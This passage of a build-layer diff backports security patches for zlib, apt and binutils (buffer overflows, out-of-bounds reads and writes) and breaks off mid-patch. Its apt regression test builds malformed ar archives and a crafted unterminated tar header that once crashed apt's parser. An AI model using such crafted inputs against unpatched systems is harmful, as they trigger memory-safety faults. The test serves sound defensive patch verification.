++     *
++     * Therefore, at a minimum, there are 142 bits of space between what is
++     * written and what is read in the overlain buffers, so the symbols cannot
++     * be overwritten by the compressed data. That space is actually 139 bits,
++     * due to the three-bit fixed-code block header.
++     *
++     * That covers the case where either Z_FIXED is specified, forcing fixed
++     * codes, or when the use of fixed codes is chosen, because that choice
++     * results in a smaller compressed block than dynamic codes. That latter
++     * condition then assures that the above analysis also covers all dynamic
++     * blocks. A dynamic-code block will only be chosen to be emitted if it has
++     * fewer bits than a fixed-code block would for the same set of symbols.
++     * Therefore its average symbol length is assured to be less than 31. So
++     * the compressed data for a dynamic block also cannot overwrite the
++     * symbols from which it is being constructed.
++     */
++
++    s->pending_buf = (uchf *) ZALLOC(strm, s->lit_bufsize, 4);
++    s->pending_buf_size = (ulg)s->lit_bufsize * 4;
+ 
+     if (s->window == Z_NULL || s->prev == Z_NULL || s->head == Z_NULL ||
+         s->pending_buf == Z_NULL) {
+@@ -340,8 +373,12 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
+         deflateEnd (strm);
+         return Z_MEM_ERROR;
+     }
+-    s->d_buf = overlay + s->lit_bufsize/sizeof(ush);
+-    s->l_buf = s->pending_buf + (1+sizeof(ush))*s->lit_bufsize;
++    s->sym_buf = s->pending_buf + s->lit_bufsize;
++    s->sym_end = (s->lit_bufsize - 1) * 3;
++    /* We avoid equality with lit_bufsize*3 because of wraparound at 64K
++     * on 16 bit machines and because stored blocks are restricted to
++     * 64K-1 bytes.
++     */
+ 
+     s->level = level;
+     s->strategy = strategy;
+@@ -552,7 +589,7 @@ int ZEXPORT deflatePrime (strm, bits, value)
+ 
+     if (deflateStateCheck(strm)) return Z_STREAM_ERROR;
+     s = strm->state;
+-    if ((Bytef *)(s->d_buf) < s->pending_out + ((Buf_size + 7) >> 3))
++    if (s->sym_buf < s->pending_out + ((Buf_size + 7) >> 3))
+         return Z_BUF_ERROR;
+     do {
+         put = Buf_size - s->bi_valid;
+@@ -1113,7 +1150,6 @@ int ZEXPORT deflateCopy (dest, source)
+ #else
+     deflate_state *ds;
+     deflate_state *ss;
+-    ushf *overlay;
+ 
+ 
+     if (deflateStateCheck(source) || dest == Z_NULL) {
+@@ -1133,8 +1169,7 @@ int ZEXPORT deflateCopy (dest, source)
+     ds->window = (Bytef *) ZALLOC(dest, ds->w_size, 2*sizeof(Byte));
+     ds->prev   = (Posf *)  ZALLOC(dest, ds->w_size, sizeof(Pos));
+     ds->head   = (Posf *)  ZALLOC(dest, ds->hash_size, sizeof(Pos));
+-    overlay = (ushf *) ZALLOC(dest, ds->lit_bufsize, sizeof(ush)+2);
+-    ds->pending_buf = (uchf *) overlay;
++    ds->pending_buf = (uchf *) ZALLOC(dest, ds->lit_bufsize, 4);
+ 
+     if (ds->window == Z_NULL || ds->prev == Z_NULL || ds->head == Z_NULL ||
+         ds->pending_buf == Z_NULL) {
+@@ -1148,8 +1183,7 @@ int ZEXPORT deflateCopy (dest, source)
+     zmemcpy(ds->pending_buf, ss->pending_buf, (uInt)ds->pending_buf_size);
+ 
+     ds->pending_out = ds->pending_buf + (ss->pending_out - ss->pending_buf);
+-    ds->d_buf = overlay + ds->lit_bufsize/sizeof(ush);
+-    ds->l_buf = ds->pending_buf + (1+sizeof(ush))*ds->lit_bufsize;
++    ds->sym_buf = ds->pending_buf + ds->lit_bufsize;
+ 
+     ds->l_desc.dyn_tree = ds->dyn_ltree;
+     ds->d_desc.dyn_tree = ds->dyn_dtree;
+@@ -1925,7 +1959,7 @@ local block_state deflate_fast(s, flush)
+         FLUSH_BLOCK(s, 1);
+         return finish_done;
+     }
+-    if (s->last_lit)
++    if (s->sym_next)
+         FLUSH_BLOCK(s, 0);
+     return block_done;
+ }
+@@ -2056,7 +2090,7 @@ local block_state deflate_slow(s, flush)
+         FLUSH_BLOCK(s, 1);
+         return finish_done;
+     }
+-    if (s->last_lit)
++    if (s->sym_next)
+         FLUSH_BLOCK(s, 0);
+     return block_done;
+ }
+@@ -2131,7 +2165,7 @@ local block_state deflate_rle(s, flush)
+         FLUSH_BLOCK(s, 1);
+         return finish_done;
+     }
+-    if (s->last_lit)
++    if (s->sym_next)
+         FLUSH_BLOCK(s, 0);
+     return block_done;
+ }
+@@ -2170,7 +2204,7 @@ local block_state deflate_huff(s, flush)
+         FLUSH_BLOCK(s, 1);
+         return finish_done;
+     }
+-    if (s->last_lit)
++    if (s->sym_next)
+         FLUSH_BLOCK(s, 0);
+     return block_done;
+ }
+diff --git a/deflate.h b/deflate.h
+index 23ecdd312..d4cf1a98b 100644
+--- a/deflate.h
++++ b/deflate.h
+@@ -217,7 +217,7 @@ typedef struct internal_state {
+     /* Depth of each subtree used as tie breaker for trees of equal frequency
+      */
+ 
+-    uchf *l_buf;          /* buffer for literals or lengths */
++    uchf *sym_buf;        /* buffer for distances and literals/lengths */
+ 
+     uInt  lit_bufsize;
+     /* Size of match buffer for literals/lengths.  There are 4 reasons for
+@@ -239,13 +239,8 @@ typedef struct internal_state {
+      *   - I can't count above 4
+      */
+ 
+-    uInt last_lit;      /* running index in l_buf */
+-
+-    ushf *d_buf;
+-    /* Buffer for distances. To simplify the code, d_buf and l_buf have
+-     * the same number of elements. To use different lengths, an extra flag
+-     * array would be necessary.
+-     */
++    uInt sym_next;      /* running index in sym_buf */
++    uInt sym_end;       /* symbol table full when sym_next reaches this */
+ 
+     ulg opt_len;        /* bit length of current block with optimal trees */
+     ulg static_len;     /* bit length of current block with static trees */
+@@ -325,20 +320,22 @@ void ZLIB_INTERNAL _tr_stored_block OF((deflate_state *s, charf *buf,
+ 
+ # define _tr_tally_lit(s, c, flush) \
+   { uch cc = (c); \
+-    s->d_buf[s->last_lit] = 0; \
+-    s->l_buf[s->last_lit++] = cc; \
++    s->sym_buf[s->sym_next++] = 0; \
++    s->sym_buf[s->sym_next++] = 0; \
++    s->sym_buf[s->sym_next++] = cc; \
+     s->dyn_ltree[cc].Freq++; \
+-    flush = (s->last_lit == s->lit_bufsize-1); \
++    flush = (s->sym_next == s->sym_end); \
+    }
+ # define _tr_tally_dist(s, distance, length, flush) \
+   { uch len = (uch)(length); \
+     ush dist = (ush)(distance); \
+-    s->d_buf[s->last_lit] = dist; \
+-    s->l_buf[s->last_lit++] = len; \
++    s->sym_buf[s->sym_next++] = dist; \
++    s->sym_buf[s->sym_next++] = dist >> 8; \
++    s->sym_buf[s->sym_next++] = len; \
+     dist--; \
+     s->dyn_ltree[_length_code[len]+LITERALS+1].Freq++; \
+     s->dyn_dtree[d_code(dist)].Freq++; \
+-    flush = (s->last_lit == s->lit_bufsize-1); \
++    flush = (s->sym_next == s->sym_end); \
+   }
+ #else
+ # define _tr_tally_lit(s, c, flush) flush = _tr_tally(s, 0, c)
+diff --git a/trees.c b/trees.c
+index 4f4a65011..decaeb7c3 100644
+--- a/trees.c
++++ b/trees.c
+@@ -416,7 +416,7 @@ local void init_block(s)
+ 
+     s->dyn_ltree[END_BLOCK].Freq = 1;
+     s->opt_len = s->static_len = 0L;
+-    s->last_lit = s->matches = 0;
++    s->sym_next = s->matches = 0;
+ }
+ 
+ #define SMALLEST 1
+@@ -948,7 +948,7 @@ void ZLIB_INTERNAL _tr_flush_block(s, buf, stored_len, last)
+ 
+         Tracev((stderr, "\nopt %lu(%lu) stat %lu(%lu) stored %lu lit %u ",
+                 opt_lenb, s->opt_len, static_lenb, s->static_len, stored_len,
+-                s->last_lit));
++                s->sym_next / 3));
+ 
+         if (static_lenb <= opt_lenb) opt_lenb = static_lenb;
+ 
+@@ -1017,8 +1017,9 @@ int ZLIB_INTERNAL _tr_tally (s, dist, lc)
+     unsigned dist;  /* distance of matched string */
+     unsigned lc;    /* match length-MIN_MATCH or unmatched char (if dist==0) */
+ {
+-    s->d_buf[s->last_lit] = (ush)dist;
+-    s->l_buf[s->last_lit++] = (uch)lc;
++    s->sym_buf[s->sym_next++] = dist;
++    s->sym_buf[s->sym_next++] = dist >> 8;
++    s->sym_buf[s->sym_next++] = lc;
+     if (dist == 0) {
+         /* lc is the unmatched char */
+         s->dyn_ltree[lc].Freq++;
+@@ -1033,30 +1034,7 @@ int ZLIB_INTERNAL _tr_tally (s, dist, lc)
+         s->dyn_ltree[_length_code[lc]+LITERALS+1].Freq++;
+         s->dyn_dtree[d_code(dist)].Freq++;
+     }
+-
+-#ifdef TRUNCATE_BLOCK
+-    /* Try to guess if it is profitable to stop the current block here */
+-    if ((s->last_lit & 0x1fff) == 0 && s->level > 2) {
+-        /* Compute an upper bound for the compressed length */
+-        ulg out_length = (ulg)s->last_lit*8L;
+-        ulg in_length = (ulg)((long)s->strstart - s->block_start);
+-        int dcode;
+-        for (dcode = 0; dcode < D_CODES; dcode++) {
+-            out_length += (ulg)s->dyn_dtree[dcode].Freq *
+-                (5L+extra_dbits[dcode]);
+-        }
+-        out_length >>= 3;
+-        Tracev((stderr,"\nlast_lit %u, in %ld, out ~%ld(%ld%%) ",
+-               s->last_lit, in_length, out_length,
+-               100L - out_length*100L/in_length));
+-        if (s->matches < s->last_lit/2 && out_length < in_length/2) return 1;
+-    }
+-#endif
+-    return (s->last_lit == s->lit_bufsize-1);
+-    /* We avoid equality with lit_bufsize because of wraparound at 64K
+-     * on 16 bit machines and because stored blocks are restricted to
+-     * 64K-1 bytes.
+-     */
++    return (s->sym_next == s->sym_end);
+ }
+ 
+ /* ===========================================================================
+@@ -1069,13 +1047,14 @@ local void compress_block(s, ltree, dtree)
+ {
+     unsigned dist;      /* distance of matched string */
+     int lc;             /* match length or unmatched char (if dist == 0) */
+-    unsigned lx = 0;    /* running index in l_buf */
++    unsigned sx = 0;    /* running index in sym_buf */
+     unsigned code;      /* the code to send */
+     int extra;          /* number of extra bits to send */
+ 
+-    if (s->last_lit != 0) do {
+-        dist = s->d_buf[lx];
+-        lc = s->l_buf[lx++];
++    if (s->sym_next != 0) do {
++        dist = s->sym_buf[sx++] & 0xff;
++        dist += (unsigned)(s->sym_buf[sx++] & 0xff) << 8;
++        lc = s->sym_buf[sx++];
+         if (dist == 0) {
+             send_code(s, lc, ltree); /* send a literal byte */
+             Tracecv(isgraph(lc), (stderr," '%c' ", lc));
+@@ -1100,11 +1079,10 @@ local void compress_block(s, ltree, dtree)
+             }
+         } /* literal or match pair ? */
+ 
+-        /* Check that the overlay between pending_buf and d_buf+l_buf is ok: */
+-        Assert((uInt)(s->pending) < s->lit_bufsize + 2*lx,
+-               "pendingBuf overflow");
++        /* Check that the overlay between pending_buf and sym_buf is ok: */
++        Assert(s->pending < s->lit_bufsize + sx, "pendingBuf overflow");
+ 
+-    } while (lx < s->last_lit);
++    } while (sx < s->sym_next);
+ 
+     send_code(s, END_BLOCK, ltree);
+ }
diff --git a/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch b/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch
new file mode 100644
index 0000000000..d29e6e0f1f
--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch
@@ -0,0 +1,44 @@
+From 8617d83d6939754ae3a04fc2d22daa18eeea2a43 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 17 Aug 2022 10:15:57 +0530
+Subject: [PATCH] CVE-2022-37434
+
+Upstream-Status: Backport [https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1 & https://github.com/madler/zlib/commit/1eb7682f845ac9e9bf9ae35bbfb3bad5dacbd91d]
+CVE: CVE-2022-37434
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+Fix a bug when getting a gzip header extra field with inflate().
+
+If the extra field was larger than the space the user provided with
+inflateGetHeader(), and if multiple calls of inflate() delivered
+the extra header data, then there could be a buffer overflow of the
+provided space. This commit assures that provided space is not
+exceeded.
+
+ Fix extra field processing bug that dereferences NULL state->head.
+
+The recent commit to fix a gzip header extra field processing bug
+introduced the new bug fixed here.
+---
+ inflate.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/inflate.c b/inflate.c
+index ac333e8..cd01857 100644
+--- a/inflate.c
++++ b/inflate.c
+@@ -759,8 +759,9 @@ int flush;
+                 if (copy > have) copy = have;
+                 if (copy) {
+                     if (state->head != Z_NULL &&
+-                        state->head->extra != Z_NULL) {
+-                        len = state->head->extra_len - state->length;
++                        state->head->extra != Z_NULL &&
++                        (len = state->head->extra_len - state->length) <
++                            state->head->extra_max) {
+                         zmemcpy(state->head->extra + len, next,
+                                 len + copy > state->head->extra_max ?
+                                 state->head->extra_max - len : copy);
+-- 
+2.25.1
+
diff --git a/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch b/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch
new file mode 100644
index 0000000000..654579eb81
--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch
@@ -0,0 +1,40 @@
+From 73331a6a0481067628f065ffe87bb1d8f787d10c Mon Sep 17 00:00:00 2001
+From: Hans Wennborg <hans@chromium.org>
+Date: Fri, 18 Aug 2023 11:05:33 +0200
+Subject: [PATCH] Reject overflows of zip header fields in minizip.
+
+This checks the lengths of the file name, extra field, and comment
+that would be put in the zip headers, and rejects them if they are
+too long. They are each limited to 65535 bytes in length by the zip
+format. This also avoids possible buffer overflows if the provided
+fields are too long.
+
+Upstream-Status: Backport from [https://github.com/madler/zlib/commit/73331a6a0481067628f065ffe87bb1d8f787d10c]
+CVE: CVE-2023-45853
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+---
+ contrib/minizip/zip.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/contrib/minizip/zip.c b/contrib/minizip/zip.c
+index 3d3d4cadd..0446109b2 100644
+--- a/contrib/minizip/zip.c
++++ b/contrib/minizip/zip.c
+@@ -1043,6 +1043,17 @@ extern int ZEXPORT zipOpenNewFileInZip4_64(zipFile file, const char* filename, c
+       return ZIP_PARAMERROR;
+ #endif
+ 
++    // The filename and comment length must fit in 16 bits.
++    if ((filename!=NULL) && (strlen(filename)>0xffff))
++        return ZIP_PARAMERROR;
++    if ((comment!=NULL) && (strlen(comment)>0xffff))
++        return ZIP_PARAMERROR;
++    // The extra field length must fit in 16 bits. If the member also requires
++    // a Zip64 extra block, that will also need to fit within that 16-bit
++    // length, but that will be checked for later.
++    if ((size_extrafield_local>0xffff) || (size_extrafield_global>0xffff))
++        return ZIP_PARAMERROR;
++
+     zi = (zip64_internal*)file;
+ 
+     if (zi->in_opened_file_inzip == 1)
diff --git a/meta/recipes-core/zlib/zlib_1.2.11.bb b/meta/recipes-core/zlib/zlib_1.2.11.bb
index ef9431ae47..9355f0556e 100644
--- a/meta/recipes-core/zlib/zlib_1.2.11.bb
+++ b/meta/recipes-core/zlib/zlib_1.2.11.bb
@@ -8,7 +8,10 @@ LIC_FILES_CHKSUM = "file://zlib.h;beginline=6;endline=23;md5=5377232268e952e9ef6
 
 SRC_URI = "${SOURCEFORGE_MIRROR}/libpng/${BPN}/${PV}/${BPN}-${PV}.tar.xz \
            file://ldflags-tests.patch \
+           file://CVE-2018-25032.patch \
            file://run-ptest \
+	    file://CVE-2022-37434.patch \
+           file://CVE-2023-45853.patch \
            "
 UPSTREAM_CHECK_URI = "http://zlib.net/"
 
@@ -50,3 +53,6 @@ do_install_append_class-target() {
 }
 
 BBCLASSEXTEND = "native nativesdk"
+
+# this CVE is for cloudflare zlib
+CVE_CHECK_WHITELIST += "CVE-2023-6992"
diff --git a/meta/recipes-devtools/apt/apt.inc b/meta/recipes-devtools/apt/apt.inc
index 13f5969f86..251795eeca 100644
--- a/meta/recipes-devtools/apt/apt.inc
+++ b/meta/recipes-devtools/apt/apt.inc
@@ -2,6 +2,7 @@ SUMMARY = "Advanced front-end for dpkg"
 DESCRIPTION = "Provides command-line tools for searching and managing as well \
 as querying information about packages as a low-level access to all features \
 of the libapt-pkg library."
+HOMEPAGE = "https://packages.debian.org/jessie/apt"
 LICENSE = "GPLv2.0+"
 SECTION = "base"
 
@@ -17,6 +18,7 @@ SRC_URI = "https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/${BPN}/${P
            file://0001-environment.mak-musl-based-systems-can-generate-shar.patch \
            file://0001-apt-1.2.12-Fix-musl-build.patch \
            file://0001-Include-array.h-for-std-array.patch \
+           file://CVE-2020-3810.patch \
            "
 SRC_URI[md5sum] = "d30eed9304e82ea8238c854b5c5a34d9"
 SRC_URI[sha256sum] = "03ded4f5e9b8d43ecec083704b2dcabf20c182ed382db9ac7251da0b0b038059"
@@ -35,5 +37,9 @@ do_configure_prepend() {
     rm -rf ${S}/buildlib/config.guess
 }
 
+# there are code generation issues with some compilers in the SHA256 implementation
+# turn off strict-aliasing to avoid these issues
+CXXFLAGS:append = " -fno-strict-aliasing"
+
 USERADD_PACKAGES = "${PN}"
 USERADD_PARAM_${PN} = "--system --no-create-home --home-dir /nonexistent --shell /bin/false --user-group _apt"
diff --git a/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch b/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch
new file mode 100644
index 0000000000..cf1206a3fa
--- /dev/null
+++ b/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch
@@ -0,0 +1,174 @@
+From dceb1e49e4b8e4dadaf056be34088b415939cda6 Mon Sep 17 00:00:00 2001
+From: Julian Andres Klode <julian.klode@canonical.com>
+Date: Tue, 12 May 2020 11:49:09 +0200
+Subject: [PATCH] SECURITY UPDATE: Fix out of bounds read in .ar and .tar
+ implementation (CVE-2020-3810)
+
+When normalizing ar member names by removing trailing whitespace
+and slashes, an out-out-bound read can be caused if the ar member
+name consists only of such characters, because the code did not
+stop at 0, but would wrap around and continue reading from the
+stack, without any limit.
+
+Add a check to abort if we reached the first character in the
+name, effectively rejecting the use of names consisting just
+of slashes and spaces.
+
+Furthermore, certain error cases in arfile.cc and extracttar.cc have
+included member names in the output that were not checked at all and
+might hence not be nul terminated, leading to further out of bound reads.
+
+Fixes Debian/apt#111
+LP: #1878177
+
+CVE: CVE-2020-3810
+
+Upstream-Status: Backport:
+https://salsa.debian.org/apt-team/apt/-/commit/dceb1e49e4b8e4dadaf056be34088b415939cda6
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+apt-inst/contrib/arfile.cc                     | 11 ++-
+apt-inst/contrib/extracttar.cc                 |  2 +-
+.../test-github-111-invalid-armember          | 88 +++++++++++++++++++
+ 3 files changed, 98 insertions(+), 3 deletions(-)
+ create mode 100755 test/integration/test-github-111-invalid-armember
+
+diff --git a/apt-inst/contrib/arfile.cc b/st/contrib/arfile.cc
+index 3fc3afedb..5cb43c690 100644
+--- a/apt-inst/contrib/arfile.cc
++++ b/apt-inst/contrib/arfile.cc
+@@ -92,7 +92,7 @@ bool ARArchive::LoadHeaders()
+ 	  StrToNum(Head.Size,Memb->Size,sizeof(Head.Size)) == false)
+       {
+ 	 delete Memb;
+-	 return _error->Error(_("Invalid archive member header %s"), Head.Name);
++	 return _error->Error(_("Invalid archive member header"));
+       }
+ 	 
+       // Check for an extra long name string
+@@ -119,7 +119,14 @@ bool ARArchive::LoadHeaders()
+       else
+       {
+ 	 unsigned int I = sizeof(Head.Name) - 1;
+-	 for (; Head.Name[I] == ' ' || Head.Name[I] == '/'; I--);
++	 for (; Head.Name[I] == ' ' || Head.Name[I] == '/'; I--)
++	 {
++	    if (I == 0)
++	    {
++	       delete Memb;
++	       return _error->Error(_("Invalid archive member header"));
++	    }
++	 }
+ 	 Memb->Name = std::string(Head.Name,I+1);
+       }
+ 
+diff --git a/apt-inst/contrib/extracttar.cc b/apt-inst/contrib/extracttar.cc
+index 9bb0a55c0..b22f59dbc 100644
+--- a/apt-inst/contrib/extracttar.cc
++++ b/apt-inst/contrib/extracttar.cc
+@@ -254,7 +254,7 @@ bool ExtractTar::Go(pkgDirStream &Stream)
+ 	 
+ 	 default:
+ 	 BadRecord = true;
+-	 _error->Warning(_("Unknown TAR header type %u, member %s"),(unsigned)Tar->LinkFlag,Tar->Name);
++	 _error->Warning(_("Unknown TAR header type %u"), (unsigned)Tar->LinkFlag);
+ 	 break;
+       }
+       
+diff --git a/test/integration/test-github-111-invalid-armember b/test/integration/test-github-111-invalid-armember
+new file mode 100755
+index 000000000..ec2163bf6
+--- /dev/null
++++ b/test/integration/test-github-111-invalid-armember
+@@ -0,0 +1,88 @@
++#!/bin/sh
++set -e
++
++TESTDIR="$(readlink -f "$(dirname "$0")")"
++. "$TESTDIR/framework"
++setupenvironment
++configarchitecture "amd64"
++setupaptarchive
++
++# this used to crash, but it should treat it as an invalid member header
++touch ' '
++ar -q test.deb ' '
++testsuccessequal "E: Invalid archive member header" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
++
++
++rm test.deb
++touch 'x'
++ar -q test.deb 'x'
++testsuccessequal "E: This is not a valid DEB archive, missing 'debian-binary' member" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
++
++
++# <name><size> [ other fields] - name is not nul terminated here, it ends in .
++msgmsg "Unterminated ar member name"
++printf '!<arch>\0120123456789ABCDE.A123456789A.01234.01234.0123456.012345678.0.' > test.deb
++testsuccessequal "E: Invalid archive member header" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
++
++
++# unused source code for generating $tar below
++maketar() {
++	cat > maketar.c << EOF
++	#include <stdio.h>
++	#include <string.h>
++	struct tar {
++	   char Name[100];
++	   char Mode[8];
++	   char UserID[8];
++	   char GroupID[8];
++	   char Size[12];
++	   char MTime[12];
++	   char Checksum[8];
++	   char LinkFlag;
++	   char LinkName[100];
++	   char MagicNumber[8];
++	   char UserName[32];
++	   char GroupName[32];
++	   char Major[8];
++	   char Minor[8];
++	};
++
++	int main(void)
++	{
++		union {
++			struct tar t;
++			char buf[512];
++		} t;
++		for (int i = 0; i < sizeof(t.buf); i++)
++			t.buf[i] = '7';
++		memcpy(t.t.Name, "unterminatedName", 16);
++		memcpy(t.t.UserName, "userName", 8);
++		memcpy(t.t.GroupName, "thisIsAGroupNamethisIsAGroupName", 32);
++		t.t.LinkFlag = 'X'; // I AM BROKEN
++		memcpy(t.t.Size, "000000000000", sizeof(t.t.Size));
++		memset(t.t.Checksum,' ',sizeof(t.t.Checksum));
++
++		unsigned long sum = 0;
++		for (int i = 0; i < sizeof(t.buf); i++)
++			sum += t.buf[i];
++
++		int written = sprintf(t.t.Checksum, "%lo", sum);
++		for (int i = written; i < sizeof(t.t.Checksum); i++)
++			t.t.Checksum[i] = ' ';
++		fwrite(t.buf, sizeof(t.buf), 1, stdout);
++	}
++EOF
++
++	gcc maketar.c -o maketar -Wall
++	./maketar
++}
++
++
++#
++tar="unterminatedName77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777700000000000077777777777773544   X777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777userName777777777777777777777777thisIsAGroupNamethisIsAGroupName777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777"
++printf '%s' "$tar" | gzip > control.tar.gz
++cp control.tar.gz data.tar.gz
++touch debian-binary
++rm test.deb
++ar -q test.deb debian-binary control.tar.gz data.tar.gz
++testsuccessequal "W: Unknown TAR header type 88" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
+-- 
+GitLab 
diff --git a/meta/recipes-devtools/binutils/binutils-2.34.inc b/meta/recipes-devtools/binutils/binutils-2.34.inc
index b5f5a1c69a..032263fe63 100644
--- a/meta/recipes-devtools/binutils/binutils-2.34.inc
+++ b/meta/recipes-devtools/binutils/binutils-2.34.inc
@@ -24,7 +24,7 @@ BRANCH ?= "binutils-2_34-branch"
 
 UPSTREAM_CHECK_GITTAGREGEX = "binutils-(?P<pver>\d+_(\d_?)*)"
 
-SRCREV ?= "d4b50999b3b287b5f984ade2f8734aa8c9359440"
+SRCREV ?= "c4e78c0868a22971680217a41fdb73516a26813d"
 BINUTILS_GIT_URI ?= "git://sourceware.org/git/binutils-gdb.git;branch=${BRANCH};protocol=git"
 SRC_URI = "\
      ${BINUTILS_GIT_URI} \
@@ -42,7 +42,25 @@ SRC_URI = "\
      file://0015-sync-with-OE-libtool-changes.patch \
      file://0016-Check-for-clang-before-checking-gcc-version.patch \
      file://0017-binutils-drop-redundant-program_name-definition-fno-.patch \
+     file://0018-Include-members-in-the-variable-table-used-when-reso.patch \
      file://CVE-2020-0551.patch \
      file://0001-gas-improve-reproducibility-for-stabs-debugging-data.patch \
+     file://CVE-2020-16592.patch \
+     file://CVE-2020-16598.patch \
+     file://CVE-2021-20197.patch \
+     file://CVE-2021-3487.patch \
+     file://CVE-2021-3549.patch \
+     file://CVE-2020-16593.patch \
+     file://0001-CVE-2021-45078.patch \
+     file://CVE-2022-38533.patch \
+     file://CVE-2023-25588.patch \
+     file://CVE-2021-46174.patch \
+     file://CVE-2023-25584.patch \
+     file://CVE-2022-47007.patch \
+     file://CVE-2022-47008.patch \
+     file://CVE-2022-47010.patch \
+     file://CVE-2022-47011.patch \
+     file://CVE-2022-48063.patch \
+     file://CVE-2022-47695.patch \
 "
 S  = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch b/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch
new file mode 100644
index 0000000000..2af82477ac
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch
@@ -0,0 +1,257 @@
+From 161e87d12167b1e36193385485c1f6ce92f74f02 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Wed, 15 Dec 2021 11:48:42 +1030
+Subject: [PATCH] PR28694, Out-of-bounds write in stab_xcoff_builtin_type
+
+	PR 28694
+	* stabs.c (stab_xcoff_builtin_type): Make typenum unsigned.
+	Negate typenum earlier, simplifying bounds checking.  Correct
+	off-by-one indexing.  Adjust switch cases.
+
+
+CVE: CVE-2021-45078
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=161e87d12167b1e36193385485c1f6ce92f74f02]
+
+Signed-off-by: Sundeep KOKKONDA <sundeep.kokkonda@gmail.com>
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
+---
+ binutils/stabs.c | 87 ++++++++++++++++++++++++------------------------
+ 1 file changed, 43 insertions(+), 44 deletions(-)
+
+
+diff --git a/binutils/stabs.c b/binutils/stabs.c
+index 274bfb0e7fa..83ee3ea5fa4 100644
+--- a/binutils/stabs.c
++++ b/binutils/stabs.c
+@@ -202,7 +202,7 @@ static debug_type stab_find_type (void *, struct stab_handle *, const int *);
+ static bfd_boolean stab_record_type
+   (void *, struct stab_handle *, const int *, debug_type);
+ static debug_type stab_xcoff_builtin_type
+-  (void *, struct stab_handle *, int);
++  (void *, struct stab_handle *, unsigned int);
+ static debug_type stab_find_tagged_type
+   (void *, struct stab_handle *, const char *, int, enum debug_type_kind);
+ static debug_type *stab_demangle_argtypes
+@@ -3496,166 +3496,167 @@ stab_record_type (void *dhandle ATTRIBUTE_UNUSED, struct stab_handle *info,
+ 
+ static debug_type
+ stab_xcoff_builtin_type (void *dhandle, struct stab_handle *info,
+-			 int typenum)
++			 unsigned int typenum)
+ {
+   debug_type rettype;
+   const char *name;
+ 
+-  if (typenum >= 0 || typenum < -XCOFF_TYPE_COUNT)
++  typenum = -typenum - 1;
++  if (typenum >= XCOFF_TYPE_COUNT)
+     {
+-      fprintf (stderr, _("Unrecognized XCOFF type %d\n"), typenum);
++      fprintf (stderr, _("Unrecognized XCOFF type %d\n"), -typenum - 1);
+       return DEBUG_TYPE_NULL;
+     }
+-  if (info->xcoff_types[-typenum] != NULL)
+-    return info->xcoff_types[-typenum];
++  if (info->xcoff_types[typenum] != NULL)
++    return info->xcoff_types[typenum];
+ 
+-  switch (-typenum)
++  switch (typenum)
+     {
+-    case 1:
++    case 0:
+       /* The size of this and all the other types are fixed, defined
+ 	 by the debugging format.  */
+       name = "int";
+       rettype = debug_make_int_type (dhandle, 4, FALSE);
+       break;
+-    case 2:
++    case 1:
+       name = "char";
+       rettype = debug_make_int_type (dhandle, 1, FALSE);
+       break;
+-    case 3:
++    case 2:
+       name = "short";
+       rettype = debug_make_int_type (dhandle, 2, FALSE);
+       break;
+-    case 4:
++    case 3:
+       name = "long";
+       rettype = debug_make_int_type (dhandle, 4, FALSE);
+       break;
+-    case 5:
++    case 4:
+       name = "unsigned char";
+       rettype = debug_make_int_type (dhandle, 1, TRUE);
+       break;
+-    case 6:
++    case 5:
+       name = "signed char";
+       rettype = debug_make_int_type (dhandle, 1, FALSE);
+       break;
+-    case 7:
++    case 6:
+       name = "unsigned short";
+       rettype = debug_make_int_type (dhandle, 2, TRUE);
+       break;
+-    case 8:
++    case 7:
+       name = "unsigned int";
+       rettype = debug_make_int_type (dhandle, 4, TRUE);
+       break;
+-    case 9:
++    case 8:
+       name = "unsigned";
+       rettype = debug_make_int_type (dhandle, 4, TRUE);
+       break;
+-    case 10:
++    case 9:
+       name = "unsigned long";
+       rettype = debug_make_int_type (dhandle, 4, TRUE);
+       break;
+-    case 11:
++    case 10:
+       name = "void";
+       rettype = debug_make_void_type (dhandle);
+       break;
+-    case 12:
++    case 11:
+       /* IEEE single precision (32 bit).  */
+       name = "float";
+       rettype = debug_make_float_type (dhandle, 4);
+       break;
+-    case 13:
++    case 12:
+       /* IEEE double precision (64 bit).  */
+       name = "double";
+       rettype = debug_make_float_type (dhandle, 8);
+       break;
+-    case 14:
++    case 13:
+       /* This is an IEEE double on the RS/6000, and different machines
